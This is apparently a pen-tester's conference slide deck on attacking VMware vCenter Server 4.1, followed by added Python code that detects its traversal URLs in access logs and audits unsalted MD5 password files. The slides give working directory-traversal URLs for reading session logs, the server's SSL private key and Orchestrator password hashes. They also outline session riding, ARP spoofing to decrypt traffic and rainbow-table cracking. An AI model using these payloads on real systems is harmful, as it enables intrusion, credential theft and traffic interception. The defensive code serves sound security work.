ERPScan Security Scanner for SAP. Invest in security to secure investments.

How to hack VMware vCenter server in 60 seconds
Alexander Minozhenko
Pen-tester at Digital Security
Researcher, DEFCON RUSSIA DCG#7812 / Zeronights CTF
Thanks for ideas and support to Alexey Sintsov

What do pen-testers do?
• Scanning
• Fingerprinting
• Banner grabbing
• Play with passwords
• Find vulns.
• Exploit vulns.
• Escalate privs.
• Dig in
• Find ways to make attacks
• etc.

Static:
• Source code review: regexp, formal methods, hand testing
• Reverse engineering: formal methods, hands...
Dynamic:
• Fuzzing (bin/web) + typical bugs for the class + reverse engineering
• Hand testing
• Architecture analysis (logic flaws)
• Use a vuln. database (CVE/exploit-db/etc.)

Tasks:
• pwn target 8)
• show the most dangerous vulns.
• show real attacks and what an attacker can do
Time: not much :)
Targets: a large number of targets, of different types
[Slide diagram: the static/dynamic method list above next to three "Workstation" boxes; nothing further recoverable.]

VMware vCenter Server
• VMware vCenter Server is a solution to manage VMware vSphere
• vSphere is a virtualization operating system
[Diagram: one vCenter Server managing several VMware vSphere hosts, each running many VMs.]

VMware vCenter version 4.1 update 1
Services:
• Update Manager
• vCenter Orchestrator
• Chargeback
• Other
Each service has a web ... (text cut off in source)
[Screenshot of a VMware product box: "Automation: unlocks the power of VMware vSphere through proactive management. Scalability: scalable and extensible management platform. Visibility: deep visibility into every level of the virtual infrastructure."]

CVE-2009-1523: Directory traversal in Jetty web server
• http://target:9084/vci/download/health.xml/%3f/../../../../FILE
• Discovered by Claudio Criscione
• But fixed in VMware Update Manager 4.1 update 1 :(

Directory traversal in Jetty web server
• http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..\FILE.EXT
• Discovered by Alexey Sintsov
• Metasploit module vmware_update_manager_traversal.rb by sinn3r

Directory traversal: what file to read?
• Claudio Criscione proposes reading vpxd-profiler-*
• Example line:
  /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-FB72656A1DCB'/Username='FakeDomain\FakeUser'/SoapSession/Id='AD45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1
• Contains logs of SOAP requests with session ID

• "VASTO - collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions."
• http://vasto.nibblesec.org/
• vmware_updatemanager_traversal.rb: Jetty path traversal
• vmware_session_rider.rb: local proxy to ride stolen SOAPID sessions

• Fixed in version 4.1 update 1
• Contains IP addresses
[Screenshot: Firefox (Russian UI) opened on http://<target>:9084/vci/downloads/.\..\..\..\..\..\..\..\ProgramData\VMware\VMware VirtualCenter\Logs\vpxd-profiler-6.log (a second tab shows "Error 404 - Not Found"). The fetched log starts with "Section for VMware VirtualCenter, pid=3564, version 4.1, build=build-345043, option=Release" and a 2011 timestamped 'App' info line, followed by counters such as /AlarmStats/NotificationsPending/Count/total, /DbStats/Pool/Cnx/InUse/total 1, /DbStats/Pool/Cnx/Size/total 10, /DbStats/Pool/Txn/CommitCount/total 56, /DbStats/Pool/Txn/StmtCount/total 555, /EventStats/PendingEvents/Count/total 2, /InventoryStats/ManagedEntityStats/Clusters/total 2.]

• Make ARP poisoning attack
• Spoof SSL certificate

Administrators check the SSL cert
[Screenshot: vSphere Client "Security Warning" dialog, "Certificate Warnings": "An untrusted SSL certificate is installed on 'win-9iipbe5q5br' and secure communication cannot be guaranteed. Depending on your security policy, this issue might not represent a security concern. You may need to install a trusted SSL certificate on your server to prevent this warning from appearing. Click Ignore to continue using the current SSL certificate." Buttons: View Certificate / Ignore / Cancel. Checkbox: "Install this certificate and do not display any security warnings for 'win-9iipbe5q5br'".]

• Steal the SSL key via directory traversal:
  http://target:9084/vci/downloads/.\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
• Make ARP spoofing
• Decrypt traffic with the stolen SSL key
• What if ARP spoofing does not work?

VMware vCenter Orchestrator
• VMware vCO: software to automate configuration and management
• Installed by default with vCenter
• Has an interesting file: C:\Program files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties

VMware vCenter Orchestrator
• Which contains MD5 passwords without salt
• Could easily be brute-forced using rainbow tables
[Screenshot: browser window with several tabs open; the active tab fetches passwd.properties through the port 9084 traversal.]
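Added example (my code, not from the slides and not VMware or Metasploit code): a detector for the traversal patterns the slides show, the %3f/../ variant on /vci/download and the .%5C..%5C variant on /vci/downloads, applied to web access-log lines. It goes a little beyond the slides by also catching double percent-encoding. The log lines, client addresses and timestamps are constructed for illustration.

```python
"""Detect directory-traversal attempts against /vci/download(s) in web access logs.

Added example, not from the original slides. Log lines below are constructed;
the request paths reuse the two traversal encodings shown in the slides plus
a double-encoded variant and a benign request for contrast.
"""
import re
from urllib.parse import unquote

# Constructed Apache/Jetty-style access-log lines (addresses and times invented).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Nov/2011:12:33:20 +0300] "GET /vci/download/health.xml/%3f/../../../../FILE.EXT HTTP/1.1" 200 512
10.0.0.5 - - [05/Nov/2011:12:33:21 +0300] "GET /vci/downloads/.%5C..%5C..%5C..%5C..%5Cvpxd-profiler-1.log HTTP/1.1" 200 88231
10.0.0.9 - - [05/Nov/2011:12:34:02 +0300] "GET /vci/downloads/health.xml HTTP/1.1" 200 1043
10.0.0.7 - - [05/Nov/2011:12:35:10 +0300] "GET /vci/downloads/%252e%252e/%252e%252e/FILE.EXT HTTP/1.1" 404 0
"""

# client address, then the request target of the quoted request line
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"'
)


def normalize_path(raw_path: str) -> str:
    """Canonicalise a request target the way the target server ends up seeing it.

    1. Split off a real query string BEFORE decoding: the %3f in the first slide
       URL decodes to a literal '?' that stays inside the path, which is exactly
       what confused the server, so it must not be treated as a query separator.
    2. Percent-decode until the string stops changing (bounded), so single and
       double encoding collapse to the same form.
    3. Treat backslashes as separators so Windows-style .\\..\\ is visible.
    """
    path = raw_path.split("?", 1)[0]
    for _ in range(3):  # bounded; never loops forever on hostile input
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def analyze_request(raw_path: str):
    """Return a finding dict if the path has '..' segments after normalisation."""
    normalized = normalize_path(raw_path)
    dotdot = sum(1 for seg in normalized.split("/") if seg == "..")
    if dotdot == 0:
        return None
    once, twice = unquote(raw_path), unquote(unquote(raw_path))
    return {
        "raw": raw_path,
        "normalized": normalized,
        "dotdot_segments": dotdot,
        "backslash_evasion": "\\" in twice,  # .%5C..%5C style
        "double_encoded": once != twice,     # %252e style
    }


def scan_log(text: str) -> list:
    """Run analyze_request over every parseable request line in the log."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, raw_path = match.groups()
        finding = analyze_request(raw_path)
        if finding:
            finding["client"] = client
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']}: {f['dotdot_segments']} '..' segments, "
              f"backslash={f['backslash_evasion']}, double={f['double_encoded']}: "
              f"{f['normalized']}")
```

The design point is that matching has to happen after decoding and after treating backslashes as separators: a filter on the literal string ../ misses both variants shown in the slides. The query-string split deliberately comes before decoding, because the %3f in the first URL becomes a literal ? inside the path and the ../ sequence after it is the part that matters.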
[Screenshot continued: address bar http://<target>:9084/vci/downloads/.%5C..%5C..%5C..%5CProgra... (rest of the path cut off).]

VMware vCenter Orchestrator Configuration
[Screenshot: vCO web configuration UI. Left menu: General, Network, LDAP, Database, Server Certificate, Licenses, Startup Options, Troubleshooting, Plug-ins (Mail 1.1.0, SSH 1.0.2, vCenter 4.0 (4.0.0)). "VMware Virtual Infrastructure" panel with fields Host, Port, Path (/sdk), User name (vmware), Password, "Specify the user credential for the admin...", "Specify which strategy will be used for it...: Share a unique session". Remaining text unreadable.]
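Added example (my code, not the presenter's and not VMware's) for the passwd.properties finding above: an audit that flags accounts whose stored value is a bare 32-hex MD5 and groups accounts storing identical values, which is the symptom only an unsalted scheme shows. The file contents and the sha256$salt$digest format it is contrasted with are constructed for illustration; the check classifies storage formats and performs no cracking.

```python
"""Audit a Java .properties credential file for unsalted MD5 password hashes.

Added example; not from the slides and not VMware's code. The file contents
are constructed, as is the 'sha256$<salt>$<digest>' salted format used for
contrast (a hypothetical format, not vCO's). Nothing here cracks a hash: the
audit only classifies how each value is stored and shows why unsalted MD5 is
weak: equal passwords give equal hashes, so one precomputed table serves
every account.
"""
import hashlib
import re
import secrets

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")
SALTED_SHA256 = re.compile(r"^sha256\$[0-9a-f]{32}\$[0-9a-f]{64}$")


def md5_unsalted(password: str) -> str:
    """The weak scheme the slides describe: plain MD5 of the password."""
    return hashlib.md5(password.encode()).hexdigest()


def salted_sha256(password: str, salt_hex: str = "") -> str:
    """Constructed contrast scheme: random per-user salt prepended, SHA-256,
    stored as sha256$<salt>$<digest>. A fixed salt_hex makes output reproducible."""
    salt_hex = salt_hex or secrets.token_hex(16)
    digest = hashlib.sha256(bytes.fromhex(salt_hex) + password.encode()).hexdigest()
    return f"sha256${salt_hex}${digest}"


# Constructed sample file: two accounts sharing a password under the weak
# scheme and one account under the salted scheme.
SAMPLE_PROPERTIES = "\n".join([
    "# constructed sample, not the real passwd.properties",
    f"vmware={md5_unsalted('Winter2011')}",
    f"backup={md5_unsalted('Winter2011')}",
    f"auditor={salted_sha256('Winter2011', salt_hex='00' * 16)}",
])


def parse_properties(text: str) -> dict:
    """Minimal key=value parser; comments and blank lines are skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, value = line.split("=", 1)
        entries[key.strip()] = value.strip()
    return entries


def classify_hash(value: str) -> str:
    """Name the storage format of one stored credential value."""
    if MD5_HEX.match(value):
        return "unsalted-md5"
    if SALTED_SHA256.match(value):
        return "salted-sha256"
    return "unknown"


def audit(text: str) -> dict:
    """Report accounts stored as unsalted MD5, and groups of accounts whose
    stored value is identical (possible only without a per-user salt)."""
    entries = parse_properties(text)
    unsalted = [u for u, h in entries.items() if classify_hash(h) == "unsalted-md5"]
    by_hash: dict = {}
    for user, value in entries.items():
        by_hash.setdefault(value, []).append(user)
    shared = {h: users for h, users in by_hash.items() if len(users) > 1}
    return {"unsalted": unsalted, "shared_hashes": shared}


if __name__ == "__main__":
    report = audit(SAMPLE_PROPERTIES)
    print("unsalted MD5 accounts:", report["unsalted"])
    for digest, users in report["shared_hashes"].items():
        print(f"accounts sharing stored value {digest}: {users}")
```

Running the audit on the constructed file lists both vmware and backup as unsalted and shows them sharing one stored value, while the salted account is neither linkable nor reusable across a precomputed table.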